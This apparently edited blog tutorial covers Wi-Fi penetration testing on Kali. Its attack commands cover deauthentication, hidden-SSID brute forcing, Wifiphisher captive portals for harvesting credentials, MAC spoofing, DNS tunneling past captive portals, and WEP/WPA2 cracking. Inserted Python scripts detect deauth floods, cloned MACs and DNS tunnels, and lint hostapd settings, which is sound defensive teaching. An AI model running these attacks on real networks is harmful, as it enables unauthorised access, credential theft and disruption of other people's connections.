Wi-Fi is a wireless networking technology that allows devices such as computers (laptops and desktops), mobile devices (smartphones and wearables), and other equipment (printers and video cameras) to interface with the Internet. It allows these devices, and many more, to exchange information with one another, creating a network.
As soon as networking went wireless, it opened a new, wide attack surface and a brand new way to compromise a private network or even an intranet. Cracking weak encryption, MAC/IP spoofing, DNS poisoning, piggybacking, wardriving, rogue access points, fake captive portals, MitM and many more have been among the most popular ways to compromise a network over the last decade.
Today I will list a few simple and common attack vectors that exist in wireless networks. For more background, please see our previous review of the most common attack vectors.
First, let’s list the basic commands and tools. I am using a Kali Purple edition virtual machine, where all of the tools I will use in this review are available out of the box. To interact with WiFi networks I need a wireless adapter; I use a cheap $14 TP-Link Archer T3U adapter based on the RTL88x2BU chipset.
WiFi penetration testing: basic attack techniques
Before we start!
Check interface mode and status:
$ iwconfig $INTERFACE_NAME
$ ifconfig $INTERFACE_NAME
Set monitor mode with airmon-ng suite:
$ airmon-ng check kill
$ ifconfig $INTERFACE_NAME down
$ iwconfig $INTERFACE_NAME mode monitor
$ ifconfig $INTERFACE_NAME up
List networks:
$ airodump-ng $INTERFACE_NAME -c $CHANNEL --essid $ESSID
Deauthentication:
# Only one client
$ aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $INTERFACE_NAME
# All the clients in the AP
$ aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC $INTERFACE_NAME
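A defender’s counterpart to the deauthentication commands above, as an added example that is not part of the original post: a small Python script that reads a constructed log of management frames and reports bursts of deauthentication or disassociation frames aimed at one destination, whether a single client or the broadcast address. The four-column log format (timestamp, subtype, BSSID, destination), the sample frames and the window/threshold values are all assumptions for this example; on a real network you would feed it the same fields exported from a capture. The mitigation on the access-point side is 802.11w Protected Management Frames, which authenticates these frames so that forged ones are dropped.

```python
"""Flag deauthentication/disassociation floods in a frame log (added example).

Input format (assumed for this example): one frame per line,
    <timestamp_seconds> <subtype> <bssid> <destination_mac>
which is what a capture tool exporting those four fields would produce.
"""
from collections import defaultdict
from dataclasses import dataclass

# Constructed sample: eight deauth frames broadcast from one BSSID inside two
# seconds (a flood), plus two isolated disconnects to a single client minutes
# apart (normal idle/roaming behaviour that must not raise an alert).
SAMPLE_FRAMES = """
# ts      subtype  bssid              destination
0.000     beacon   aa:bb:cc:dd:ee:01  ff:ff:ff:ff:ff:ff
1.000     deauth   aa:bb:cc:dd:ee:01  ff:ff:ff:ff:ff:ff
1.210     deauth   aa:bb:cc:dd:ee:01  ff:ff:ff:ff:ff:ff
1.430     deauth   aa:bb:cc:dd:ee:01  ff:ff:ff:ff:ff:ff
1.650     deauth   aa:bb:cc:dd:ee:01  ff:ff:ff:ff:ff:ff
1.870     deauth   aa:bb:cc:dd:ee:01  ff:ff:ff:ff:ff:ff
2.090     deauth   aa:bb:cc:dd:ee:01  ff:ff:ff:ff:ff:ff
2.310     deauth   aa:bb:cc:dd:ee:01  ff:ff:ff:ff:ff:ff
2.530     deauth   aa:bb:cc:dd:ee:01  ff:ff:ff:ff:ff:ff
3.000     data     aa:bb:cc:dd:ee:01  11:22:33:44:55:66
60.000    deauth   aa:bb:cc:dd:ee:01  11:22:33:44:55:66
400.000   disassoc aa:bb:cc:dd:ee:01  11:22:33:44:55:66
"""

DISCONNECT_SUBTYPES = {"deauth", "disassoc"}
BROADCAST = "ff:ff:ff:ff:ff:ff"


@dataclass(frozen=True)
class Frame:
    ts: float
    subtype: str
    bssid: str
    dst: str


def parse_frames(text):
    """Parse the four-column log; blank lines and '#' comments are skipped."""
    frames = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, subtype, bssid, dst = line.split()
        frames.append(Frame(float(ts), subtype.lower(), bssid.lower(), dst.lower()))
    return frames


def max_in_window(times, window):
    """Largest number of timestamps that fall inside any span of `window` seconds."""
    times = sorted(times)
    best, start = 0, 0
    for end, t in enumerate(times):
        while t - times[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best


def detect_deauth_floods(frames, window=10.0, threshold=5):
    """Return [(bssid, destination, peak_count, is_broadcast)] for every
    (BSSID, destination) pair that received at least `threshold` disconnect
    frames within `window` seconds. The window and threshold are example values."""
    per_target = defaultdict(list)
    for f in frames:
        if f.subtype in DISCONNECT_SUBTYPES:
            per_target[(f.bssid, f.dst)].append(f.ts)
    alerts = []
    for (bssid, dst), times in per_target.items():
        peak = max_in_window(times, window)
        if peak >= threshold:
            alerts.append((bssid, dst, peak, dst == BROADCAST))
    return sorted(alerts)


if __name__ == "__main__":
    for bssid, dst, peak, bcast in detect_deauth_floods(parse_frames(SAMPLE_FRAMES)):
        kind = "broadcast (all clients)" if bcast else f"targeted at {dst}"
        print(f"deauth flood from {bssid}: {peak} frames in window, {kind}")
```

The sliding window is what separates an attack from normal operation: a single deauthentication is routine, a dozen per second to one destination is not. Keying the count on the (BSSID, destination) pair also tells you whether one client or the whole cell was targeted, which is the difference between the two aireplay-ng forms above.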
Getting a hidden SSID with clients. List the networks using airodump-ng and get the AP’s MAC address ($AP_MAC) and one from a client ($CLIENT_MAC). Then, in another terminal, deauthenticate a client or all of them. When airodump-ng captures a handshake from this network, the name (ESSID) will appear in the first terminal:
$ aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $INTERFACE_NAME
Getting a hidden SSID without clients. List the networks using airodump-ng and get the AP’s MAC address ($AP_MAC). Then use mdk3 to brute force the SSID. Do not stop the capture:
# Execute a dictionary attack
$ mdk3 $INTERFACE_NAME p -t $AP_MAC -f $DICTIONARY_PATH
# Bruteforce attack
$ mdk3 $INTERFACE_NAME p -t $AP_MAC -c $AP_CHANNEL -b $CHARACTER_SET
Open networks
Public Wi-Fi networks, or hotspots, in coffee shops, malls, airports, hotels and other places are convenient. Most of the time they use no enhanced security configuration, or are not secured at all.
Fake captive portals
- Clone any website using a tool like HTTrack.
- Install Wifiphisher. Put the HTTrack result in a new folder at wifiphisher/data/phishingpages/new_page/html and add a configuration file at wifiphisher/data/phishingpages/new_page/config.ini.
- Rebuild and install the project with python setup.py install, or use the binary in bin. This step may require installing hostapd.
- Now you are ready to deauth any client and wait for someone to log in and leave their credentials.
Bypassing open network authentication with MAC spoofing
One method to bypass a captive portal is to change your MAC address to that of an already authenticated user. First, scan the network to get the list of IP and MAC addresses; nmap host discovery alone (no port scan) is enough:
$ nmap 192.168.1.1/24 -sn
Change your MAC address to the chosen client’s using macchanger (the interface must be down while it is changed):
$ macchanger -m $CLIENT_MAC $INTERFACE_NAME
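Seen from the gateway, a cloned MAC address is two devices answering for one identity, and that shows up as the same MAC flapping between two IP addresses or two access points within seconds. The following Python script, an added example that is not part of the original post, demonstrates that check over a constructed log of (timestamp, MAC, IP, AP) observations such as a captive-portal gateway could build from its ARP/DHCP view and the controller’s association table. The log format, the sample rows and the 120-second window are assumptions for the example. The real fix is not to base authorisation on the MAC address alone, since per-user credentials (WPA2/WPA3-Enterprise, or a portal session bound to more than the MAC) cannot be copied this way.

```python
"""Detect cloned MAC addresses from gateway observations (added example).

Assumed input: one observation per line,
    <timestamp_seconds> <mac> <ip> <ap_name>
"""
from collections import defaultdict
from dataclasses import dataclass

# Constructed sample: 11:22:33:44:55:66 is seen alternating between two
# IPs and two APs within seconds (two devices sharing the MAC), while
# de:ad:be:ef:00:01 changes IP and AP only once, 14 minutes apart (a real roam).
SAMPLE_OBSERVATIONS = """
# ts   mac                ip             ap
0      11:22:33:44:55:66  192.168.1.50   ap-lobby
30     11:22:33:44:55:66  192.168.1.50   ap-lobby
45     de:ad:be:ef:00:01  192.168.1.51   ap-lobby
60     11:22:33:44:55:66  192.168.1.77   ap-cafe
65     11:22:33:44:55:66  192.168.1.50   ap-lobby
70     11:22:33:44:55:66  192.168.1.77   ap-cafe
900    de:ad:be:ef:00:01  192.168.1.91   ap-cafe
"""


@dataclass(frozen=True)
class Observation:
    ts: float
    mac: str
    ip: str
    ap: str


def parse_observations(text):
    """Parse the four-column log; blank lines and '#' comments are skipped."""
    rows = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, mac, ip, ap = line.split()
        rows.append(Observation(float(ts), mac.lower(), ip, ap))
    return rows


def detect_mac_clones(observations, window=120.0):
    """Return sorted (mac, field, value_a, value_b) tuples for every MAC whose
    IP or AP changed back and forth within `window` seconds. Slow changes
    (lease renewals, genuine roaming) fall outside the window and are ignored.
    The window is an example value."""
    by_mac = defaultdict(list)
    for o in observations:
        by_mac[o.mac].append(o)
    alerts = set()
    for mac, rows in by_mac.items():
        rows.sort(key=lambda o: o.ts)
        for prev, cur in zip(rows, rows[1:]):
            if cur.ts - prev.ts > window:
                continue
            for field in ("ip", "ap"):
                a, b = getattr(prev, field), getattr(cur, field)
                if a != b:
                    # Store the pair in a fixed order so A->B and B->A dedupe.
                    alerts.add((mac, field) + tuple(sorted((a, b))))
    return sorted(alerts)


if __name__ == "__main__":
    for mac, field, a, b in detect_mac_clones(parse_observations(SAMPLE_OBSERVATIONS)):
        print(f"possible cloned MAC {mac}: {field} flapping between {a} and {b}")
```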
Bypassing open network authentication with DNS tunneling
The second method is creating a DNS tunnel. For this, you need an accessible DNS server of your own. You can use this method to bypass the captive portal and get “free” WiFi in hotels and airports.
Check that domain names are resolved:
$ nslookup example.com
Create two DNS records with any registrar, such as GoDaddy or BlueHost:
- An “A record” dns.$DOMAIN pointing to $SERVER_IP (example: dns.domain.com -> 139.59.172.117)
- An “NS record” hack.$DOMAIN pointing to dns.$DOMAIN (example: hack.domain.com -> dns.domain.com)
Use iodine:
# On server
$ iodined -f -c -P $PASS -n $SERVER_IP 10.0.0.1 hack.$DOMAIN
# On client
$ iodine -f -P $PASS $DNS_SERVER_IP hack.$DOMAIN
Then create a SOCKS proxy over the tunnel with SSH:
$ ssh -D 8080 $USER@10.0.0.1
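The tunnel above only works because the portal lets DNS through, and the traffic it produces looks nothing like normal name resolution: many queries, each with a long, high-entropy, never-repeated label under one zone. The Python script below, an added example that is not part of the original post, scores a constructed resolver log on exactly those properties. The log format (timestamp, client, query name, type), the synthetic queries under hack.domain.com (the zone used in the post’s own example) and the thresholds are assumptions; the zone is approximated as the last two labels, where a real deployment would use the public suffix list.

```python
"""Score DNS query logs for tunnelling indicators (added example).

Assumed input: one query per line,
    <timestamp_seconds> <client_ip> <qname> <qtype>
"""
import base64
import hashlib
import math
from collections import Counter, defaultdict


def _tunnel_label(i):
    """Constructed stand-in for an encoded data chunk: 52 base32 characters."""
    digest = hashlib.sha256(f"chunk{i}".encode()).digest()
    return base64.b32encode(digest).decode().rstrip("=").lower()


# Constructed sample: ordinary browsing from two clients plus one client
# pushing data through high-entropy subdomains of hack.domain.com.
SAMPLE_DNS_LOG = "\n".join(
    [f"{t} 10.0.0.5 www.example.com A" for t in range(0, 50, 10)]
    + ["12 10.0.0.5 mail.example.com MX", "13 10.0.0.6 www.example.com AAAA"]
    + [f"{20 + i} 10.0.0.9 {_tunnel_label(i)}.hack.domain.com TXT" for i in range(8)]
)


def parse_queries(text):
    """Parse the four-column log; blank lines and '#' comments are skipped."""
    out = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, client, qname, qtype = line.split()
        out.append((float(ts), client, qname.rstrip(".").lower(), qtype.upper()))
    return out


def split_name(qname, zone_labels=2):
    """Split a name into (prefix, zone); the zone is the last `zone_labels` labels."""
    labels = qname.split(".")
    return ".".join(labels[:-zone_labels]), ".".join(labels[-zone_labels:])


def shannon_entropy(s):
    """Bits of entropy per character of the string s."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def score_zones(queries, min_queries=5, min_unique_ratio=0.9,
                min_avg_len=30, min_entropy=3.5):
    """Per zone: query count, share of unique prefixes, mean prefix length,
    mean prefix entropy, and a 'suspicious' verdict when all thresholds are
    met. Thresholds are example values to tune against your own baseline."""
    prefixes = defaultdict(list)
    for _, _, qname, _ in queries:
        prefix, zone = split_name(qname)
        prefixes[zone].append(prefix)
    stats = {}
    for zone, pre in prefixes.items():
        n = len(pre)
        unique_ratio = len(set(pre)) / n
        avg_len = sum(map(len, pre)) / n
        avg_entropy = sum(map(shannon_entropy, pre)) / n
        stats[zone] = {
            "queries": n,
            "unique_ratio": round(unique_ratio, 2),
            "avg_prefix_len": round(avg_len, 1),
            "avg_entropy": round(avg_entropy, 2),
            "suspicious": (n >= min_queries and unique_ratio >= min_unique_ratio
                           and avg_len >= min_avg_len and avg_entropy >= min_entropy),
        }
    return stats


if __name__ == "__main__":
    for zone, s in sorted(score_zones(parse_queries(SAMPLE_DNS_LOG)).items()):
        flag = "SUSPICIOUS" if s["suspicious"] else "ok"
        print(f"{zone:20} queries={s['queries']:3} unique={s['unique_ratio']:.2f} "
              f"len={s['avg_prefix_len']:5.1f} entropy={s['avg_entropy']:.2f} {flag}")
```

No single metric is conclusive: CDNs and some telemetry also use long unique labels, so the verdict requires count, uniqueness, length and entropy together, and the numbers should be tuned against a baseline from the network in question.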
WEP and WPA cracking
WEP IV pass cracking
Wired Equivalent Privacy (WEP) is one of the weakest wireless standards still in use. The easiest way to crack it is with airodump-ng.
Start capture:
$ airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $INTERFACE_NAME
Accelerate the IV capture with fake authentication, an ARP request replay attack and a client deauthentication. Stop airodump-ng at about 100,000 different IVs:
$ aireplay-ng -1 0 -e $AP_NAME -a $AP_MAC -h $MY_MAC $INTERFACE_NAME
$ aireplay-ng -3 -b $AP_MAC -h $MY_MAC $INTERFACE_NAME
$ aireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $INTERFACE_NAME
Use aircrack-ng to get the password:
$ aircrack-ng $PCAP_FILE
WPA2-PSK cracking
Start capture:
$ airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $INTERFACE_NAME
Deauthenticate a user. Stop the airodump-ng capture when you see the message ‘WPA handshake: $MAC’:
$ aireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $INTERFACE_NAME
Crack the handshake using aircrack-ng:
$ aircrack-ng -w $WORDLIST $PCAP_FILE
Or using Pyrit:
$ pyrit -r $PCAP_FILE analyze
$ pyrit -r $PCAP_FILE -o $CLEAN_PCAP_FILE strip
$ pyrit -i $WORDLIST import_passwords
$ pyrit eval
$ pyrit batch
$ pyrit -r $CLEAN_PCAP_FILE attack_db
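Every attack in the WEP and WPA sections depends on a setting the access point owner controls: WEP itself, WPA v1 or TKIP, a short pre-shared key that a wordlist will hit, and unprotected management frames that make the deauthentication trivial. The Python linter below, an added example that is not part of the original post, reads a hostapd.conf and reports those settings, with a constructed weak configuration beside a hardened one. The option names (wpa, wpa_pairwise, rsn_pairwise, wpa_passphrase, ieee80211w, wep_default_key, wep_keyN) are standard hostapd options; the 12-character minimum passphrase length is this example’s policy, not a hostapd requirement.

```python
"""Lint a hostapd.conf for the settings the WEP/WPA attacks rely on (added example)."""

# Constructed example of a weak access-point configuration: WPA v1 with
# TKIP, an eight-character passphrase and no management-frame protection.
WEAK_CONF = """
interface=wlan0
ssid=CoffeeShop
hw_mode=g
channel=6
wpa=1
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP
wpa_passphrase=password
"""

# The same network hardened: WPA2 only, CCMP only, a long passphrase and
# Protected Management Frames required (ieee80211w=2).
HARDENED_CONF = """
interface=wlan0
ssid=CoffeeShop
hw_mode=g
channel=6
wpa=2
wpa_key_mgmt=WPA-PSK WPA-PSK-SHA256
rsn_pairwise=CCMP
wpa_passphrase=correct-horse-battery-staple-2024
ieee80211w=2
"""


def parse_hostapd(text):
    """Parse key=value lines; blank lines and '#' comments are skipped."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        conf[key.strip()] = value.strip()
    return conf


def lint_hostapd(conf, min_passphrase_len=12):
    """Return a list of findings; an empty list means nothing here was flagged.
    `min_passphrase_len` is an example policy value."""
    findings = []
    if "wep_default_key" in conf or any(k.startswith("wep_key") for k in conf):
        findings.append("WEP keys configured: WEP is broken and the key is "
                        "recovered from captured IVs")
    wpa = conf.get("wpa", "0")
    if wpa == "0":
        findings.append("wpa=0: open network, all traffic is unencrypted")
    elif wpa in ("1", "3"):
        findings.append(f"wpa={wpa}: WPA (v1) is allowed; set wpa=2")
    for key in ("wpa_pairwise", "rsn_pairwise"):
        if "TKIP" in conf.get(key, "").upper():
            findings.append(f"{key} allows TKIP; use CCMP only")
    passphrase = conf.get("wpa_passphrase")
    if passphrase is not None and len(passphrase) < min_passphrase_len:
        findings.append(f"wpa_passphrase is {len(passphrase)} characters: a short "
                        "PSK falls to a dictionary attack on the captured handshake")
    if wpa != "0" and conf.get("ieee80211w") != "2":
        findings.append("ieee80211w is not 2: management frames are unprotected, "
                        "so deauthentication can be forced by anyone in range")
    return findings


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        findings = lint_hostapd(parse_hostapd(text))
        print(f"{name}: {len(findings)} finding(s)")
        for f in findings:
            print(f"  - {f}")
```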
Post-exploitation techniques
Once you are connected to the network, you can look at the router and the rest of the network:
- Routersploit: an exploitation framework for embedded devices. Try “use scanners/autopwn”.
- Nmap/Zenmap: security scanner, port scanner and network exploration tool.
- Masscan: the faster version of nmap (it can break things, so be careful).
- Netdiscover: ARP sniffing. Very useful if the networks are well segmented.
- Ettercap: check whether you can perform a MitM attack and sniff all the traffic on the network.
Hope you like it!
Please follow me on Twitter and subscribe to our newsletter to be in touch.
Protect your privacy, be ethical!